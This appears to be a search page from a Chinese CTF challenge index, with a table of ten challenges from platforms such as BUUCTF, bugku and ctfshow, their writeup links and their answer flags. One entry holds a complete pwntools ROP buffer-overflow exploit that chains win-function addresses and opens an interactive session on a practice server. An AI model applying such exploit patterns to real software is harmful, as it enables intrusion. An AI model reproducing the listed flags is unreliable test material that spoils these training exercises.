[标题搜索]只能搜索题目标题,[综合搜索]支持多关键词多项目搜索(以空格分隔)。
| 序号 | Website | Type | Title | Value | Writeup | Competition | Id |
|---|---|---|---|---|---|---|---|
| 1 | bugku | MISC | Temple of Time | KosenCTF{y0u_sh0u1d_us3_th3_p1ac3h01d3r} | https://blog.uta8a.net/post/2019-08-1... | InterKosenCTF2019 | 472 |
| 2 | ctfshow | WEB.吃鸡杯 | warmup | 无 | https://www.cnblogs.com/aninock/p/151... | 吃鸡杯 | 4172 |
| 3 | xuenixiang.com | Crypto | commonfactor | - | https://www.xuenixiang.com/forum.php?... | TetCTF | 15256 |
| 4 | ctfshow | WEB入门.组件漏洞 | web591 | 无 | https://yq1ng.github.io/2021/08/02/ct... | 组件漏洞 | 4122 |
| 5 | BUUCTF | Pwn | picoctf_2018_rop chain | from pwn import * r = remote("node3.buuoj.cn", 26602) win_function1 = 0x080485CB win_function2 = 0x080485D8 flag = 0x0804862B payload = "a" * 0x1c + p32(win_function1) + p32(win_function2) + p32(flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD) r.sendlineafter("input> ", payload) r.interactive() | ... | - | 8487 |
| 6 | bugku | WEB | back-to-the-past | tjctf{wh0_n33ds_sp0t1fy_a7dfd3e5} | https://angmar2722.github.io/CTFwrite... | TJCTF2023 | 1850 |
| 7 | BUUCTF | Reverse | [FlareOn4]shell | 无 | https://blog.csdn.net/bl4ckcat/articl... | FlareOn4 | 6656 |
| 8 | NSSCTF | TEA | [HGAME 2023 week4]shellcode | hgame{th1s_1s_th3_tutu's_h0mew0rk} | https://eps1l0h.github.io/2023/02/17/... | HGAME | 11456 |
| 9 | xuenixiang.com | Misc | 奇怪的TTL字段 | - | https://www.xuenixiang.com/forum.php?... | BugKu旧平台题库 | 15203 |
| 10 | BUUCTF | Crypto | [ACTF新生赛2020]crypto-rsa0 | actf{n0w_y0u_see_RSA} | https://blog.csdn.net/sm1918451478/ar... | ACTF新生赛2020 | 5879 |